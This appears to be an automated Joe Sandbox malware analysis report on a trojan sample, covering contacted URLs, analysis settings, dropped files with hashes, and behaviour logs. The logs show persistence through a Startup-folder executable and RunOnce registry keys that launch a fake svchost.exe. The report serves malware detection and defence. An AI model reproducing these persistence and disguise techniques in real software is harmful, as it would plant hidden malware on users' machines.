                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.founder.com.cn/cnVknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000003.247622790.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yVknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.sajatypeworks.comntVknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.fontbureau.commVknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.jiyu-kobo.co.jp/VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.com/designers8VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://activity.windows.comsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  low

Contacted IPs


Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483863
Start date: 15.09.2021
Start time: 15:19:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 6s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: VknMvPoCXZ (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 83
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.expl.evad.winEXE@113/58@0/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 100% (good quality ratio 95.8%)
• Quality average: 83%
• Quality standard deviation: 25.9%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 93.184.220.29, 20.199.120.85, 20.82.209.183, 20.189.173.21, 20.199.120.151, 20.199.120.182, 20.189.173.22, 20.42.73.29, 52.182.143.212, 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, cs9.wac.phicdn.net, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may have missing behavior and disassembly information.
• Report size exceeded the maximum capacity and may have missing behavior information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryAttributesFile calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
15:20:34 | API Interceptor | 4x Sleep call for process: svchost.exe modified
15:20:35 | API Interceptor | 1x Sleep call for process: VknMvPoCXZ.exe modified
15:20:50 | API Interceptor | 377x Sleep call for process: powershell.exe modified
15:20:50 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
15:21:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
15:21:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
15:21:22 | API Interceptor | 2x Sleep call for process: 481F404B.exe modified
15:21:33 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
15:21:51 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
15:21:55 | API Interceptor | 137x Sleep call for process: aspnet_compiler.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  No context

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASN

                                                                                                                  No context

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                  Process: C:\Windows\System32\svchost.exe
                                                                                                                  File Type: data
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 4096
                                                                                                                  Entropy (8bit): 0.597889115294713
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 6:0FgLgk1GaD0JOCEfMuaaD0JOCEfMKQmDd+JtAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0APGaD0JcaaD0JwQQdmtAg/0bjSQJ
                                                                                                                  MD5: 9AE4A5B8574F3175E725DF00EF2BCCCC
                                                                                                                  SHA1: 52BD0FFA1BD5ED0F9C952EE1FCFA2A206FF596D4
                                                                                                                  SHA-256: 80802285C72FB0CE935A0E6596C341CEE5928BDB4220240CF93932E384BE1BCD
                                                                                                                  SHA-512: A35AB50A730391A5E6D3D7D0D0DF198EC7C97FF5C91994996EB4F924EECE67D2D39081317DB19D195C6583D224480CCC6BC66FB5BDD61D5E5498CA6C1DF90A34
                                                                                                                  Malicious: false
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: ......:{..(....."....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..................."....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                  Process: C:\Windows\System32\svchost.exe
                                                                                                                  File Type: Extensible storage engine DataBase, version 0x620, checksum 0x17166b1a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 32768
                                                                                                                  Entropy (8bit): 0.09472530939958232
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 6:Mzwl/+U90HsRIE11Y8TRXo8asHXqKSzwl/+U90HsRIE11Y8TRXo8asHXqK:M0+UWMO4bl+sH6KS0+UWMO4bl+sH6K
                                                                                                                  MD5: 9CFDA737FCE78F047B1C6B9F28FE6BB4
                                                                                                                  SHA1: D87C7A73033D63F0C64EAD4A5B1E65A505263BEF
                                                                                                                  SHA-256: B46F1E6F00B194E503BA0AB82A80CE3AF9CB3392CCB7AE76B65BCEE5B65726CC
                                                                                                                  SHA-512: 9E719990FED79A33B3C2BABF3D2A213536762DC3509803FCB6932558ADEE2D9A7D0C65F44E441D034FBE8F2B0C04357D434EEE7F8131A5B2C640946D88AC99DC
                                                                                                                  Malicious: false
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: ..k.... ................e.f.3...w........................&..........w..#....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................D..G#....y..................b...#....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                  Process: C:\Windows\System32\svchost.exe
                                                                                                                  File Type: data
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 8192
                                                                                                                  Entropy (8bit): 0.10885277311932687
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 3:cKll9EvG1XFkl7l/bJdAtiX///all:c+lYG11kl7t4IXG
                                                                                                                  MD5: 18BC9A7B14851DC930A11663A65F23DE
                                                                                                                  SHA1: F8F5D5964D1495CB1A95E0C056DAD18AC5690709
                                                                                                                  SHA-256: D43DC4F6F56B808BEBD1F473F890D6DDEAF4EC3D000368E45E3F40A69B411FE4
                                                                                                                  SHA-512: BDFF1533834048D08BC95718B70628FBB08B45190C3FA299E24F9F7B837C8F646D03BA4D87CDFE211CD15640141E263FA92BDE75F6C3C9D6A9C49C6D571D21BC
                                                                                                                  Malicious: false
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: DQ.......................................3...w..#....y.......w...............w.......w....:O.....w..................b...#....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VknMvPoCXZ.exe_64eaf576c345d5342863ccd8192529db1bd52c80_e2466c59_0f48ed99\Report.wer
                                                                                                                  Process: C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 16762
                                                                                                                  Entropy (8bit): 3.7630351978974383
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 192:uW+eN7erHigKnaKeCiAKmYNetK/u7scS274ItWc0:x+eN7KigKnaHCK/u7scX4ItWH
                                                                                                                  MD5: 56DEE45DDDD24DA9F5C50B4938CCCA83
                                                                                                                  SHA1: 0A5776C80B3B30621DFE9E0861E6215ED9ECC5F9
                                                                                                                  SHA-256: D024A71478BE90E3FAA55C365B2BB9BDDCF153B121D869B6DB68004FFEF47653
                                                                                                                  SHA-512: 7AC3B35511B2D91F3279F01DEC6C7B9C1FF1D88323F50E30F3DD80A76F04D65F25041C97B85D6586C7D1711020B05EBEDF7D966D6AF035E1247AA370669C48B0
                                                                                                                  Malicious: true
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.8.0.8.3.5.7.5.8.0.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.8.0.9.1.4.6.6.4.2.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.5.6.3.5.7.a.-.5.4.3.6.-.4.c.f.7.-.b.f.e.6.-.1.1.3.1.a.c.7.a.0.b.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.c.b.1.4.7.a.-.f.1.8.f.-.4.a.d.9.-.b.0.2.a.-.f.4.d.7.5.8.1.0.6.b.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.k.n.M.v.P.o.C.X.Z...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...V.i.s.u.a.l.S.t.u.d.i.o...D.e.v.O.p.s...T.e.l.e.m.e.t.r.y...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.c.4.-.0.0.0.1.-.0.0.1.6.-.0.5.a.3.-.3.8.e.2.7.f.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.8.5.c.3.8.c.5.4.b.0.c.b.4.7.3.d.2.e.1.4.5.f.0.8.a.5.c.e.5.c.a.0.0.0.0.0.0.0.0.!.0.0.0.0.d.e.4.d.d.
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC744.tmp.dmp
                                                                                                                  Process: C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type: Mini DuMP crash report, 14 streams, Wed Sep 15 22:21:25 2021, 0x1205a4 type
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 379871
                                                                                                                  Entropy (8bit): 4.1539889535685806
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 3072:5rbJyOk9gIOgF5c50GfSUCgUNrvoDDMeBBRAMoXnmGH+fak3b20Pjd+pr90Mt:5JyD9RpD+YTj0buMq5+Db20IpH
                                                                                                                  MD5: A92EFD02DB32AE17F78DE3FD09CE5CE6
                                                                                                                  SHA1: 1F2122F65414870C23C52873D1C3140E70198C14
                                                                                                                  SHA-256: A91332A2E8F3ADB08FFBBCDB60109CA458149EC57E7C11D4549C10D44666D49C
                                                                                                                  SHA-512: 07D1B6F5E97760D4BDC5CD15952C16226BF268A6B7680CCC2C5E1D1E6BB40F4D05A87E5A4A06F420682B8112384124DB1D5CA8EC5DC51204D4C916DD05454B7C
                                                                                                                  Malicious: false
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: MDMP....... ........qBa...................U...........B.......,......GenuineIntelW...........T............qBa.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA60.tmp.WERInternalMetadata.xml
                                                                                                                  Process: C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 8422
                                                                                                                  Entropy (8bit): 3.698682703520275
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 192:Rrl7r3GLNiH86k6YIMSULMYegmfZfSKaCprD89bnNsfENm:RrlsNic6k6YjSULMYegmfxSKWnGfD
                                                                                                                  MD5: DDF24E91AC42E380463C5B998CDAF1FB
                                                                                                                  SHA1: 00F83BCEA6D49CEA8A76371CAA540D21B57E98E9
                                                                                                                  SHA-256: 56E7DD32B70B9A1DFFFB9C0CCCC0EE9CA96C3A9559F291A16215CD2A17C4AFCD
                                                                                                                  SHA-512: FD40E7099C360EF29774AE3006E3E2F9272DFC6EC27E7A2A30965D31493AFA0A4383ED684074506C46268D043457DA864962CD0CC048E308BF06258A3EA01117
                                                                                                                  Malicious: false
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.4.4.<./.P.i.d.>.......
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC26.tmp.xml
                                                                                                                  Process: C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type: XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 4788
                                                                                                                  Entropy (8bit): 4.498039358519405
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 48:cvIwSD8zs/JgtWI9IGWSC8BgM8fm8M4JeHOVQ1FX+q8vMOVQ9MJd7Y0rhy002Qd:uITfhvHSNsJD4KNVv1rd0Hd
                                                                                                                  MD5: 9F0F8A48808420FC92684FB96C2B2C58
                                                                                                                  SHA1: 1F92A2A8387E9571C94611877F2843E0433E9CB2
                                                                                                                  SHA-256: 703502C9BF6DDB6CC27D2E79C5274D30E6754F91E488FAF649E2A797EE2E950E
                                                                                                                  SHA-512: 758A364395405757FCE88E62E2740883DA68B3957B71FE111A8134273CF90CE96B6B7266D04B4564B9DBE87242CE3503B07B47AC9D795FAE25E491F986E0B729
                                                                                                                  Malicious: false
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168292" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC53.tmp.csv
                                                                                                                  Process: C:\Windows\System32\svchost.exe
                                                                                                                  File Type: data
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 54636
                                                                                                                  Entropy (8bit): 3.073026398744777
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 1536:QshHfvCPrkT6a227idJ4dPGYnVoBHKjv8QB604kZh:QshHfvCPrkT6a227idJ4dPGYnVUHKjv3
                                                                                                                  MD5: 11787EC20E9E1501D0C0DA787B1EEF07
                                                                                                                  SHA1: F9FB5015673B24B0F13BD914C0ECED8A0236239B
                                                                                                                  SHA-256: 448CEFD0E0ADF340D53244B813693DFA017B0A831570530B211B413794787A55
                                                                                                                  SHA-512: 03FD4B185EED29A019B98C75D3986BDABA776F4E4F965A4B0B47FE94F03CAFEBF7882A0E2B96001158C78691626E388BF794755DACF09D1396436E20AC0813F5
                                                                                                                  Malicious: false
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE424.tmp.txt
                                                                                                                  Process: C:\Windows\System32\svchost.exe
                                                                                                                  File Type: data
                                                                                                                  Category: dropped
                                                                                                                  Size (bytes): 13340
                                                                                                                  Entropy (8bit): 2.6963291623570638
                                                                                                                  Encrypted: false
                                                                                                                  SSDEEP: 96:9GiZYWgSVDwGFhYGYjZWVx6HaUYEZMJtribjZJiwwqAAla8Xc843tIv73:9jZDg0zBBxNF+a8Xc84iv73
                                                                                                                  MD5: 124B52EE4688EF5F20BDB5636985282E
                                                                                                                  SHA1: 4F4FBB4016164AFCB12847E675FD0EC14612F379
                                                                                                                  SHA-256: 850300B2AFBC3D7AD0D7071BE1DE9EDDEB810A49E1693CCB29D43F985CF8562F
                                                                                                                  SHA-512: 6865D19FC4BC00413CF5F97B3203D963DE6A504E61AB22E20C0665F94D182B0FDC070DA50882F4AFE0B1D0BA54E22FA42F8D97F7E451C98AEF6EB108553FF8FA
                                                                                                                  Malicious: false
                                                                                                                  Reputation: unknown
                                                                                                                  Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14734
                                                                                                                  Entropy (8bit):4.993014478972177
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                                  MD5:8D5E194411E038C060288366D6766D3D
                                                                                                                  SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                                  SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                                  SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):21612
                                                                                                                  Entropy (8bit):5.600891430343444
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ctL6Rq0vKcoo0ClK7i3n3IS0nEjultICspE93Uu16zC5maxHVs3QSKj6I8I++jd:CoLYTEClt4wuCUCaQPmlQ
                                                                                                                  MD5:09C404B27F5292390D39AF53E7C6A6E4
                                                                                                                  SHA1:B4218A4F9A11BE3E29B053656B8FE1FB6CE54574
                                                                                                                  SHA-256:4A7D019EAB126BF9971DD10C6E47658407A986EF25294A87BA2C3BB4104F7706
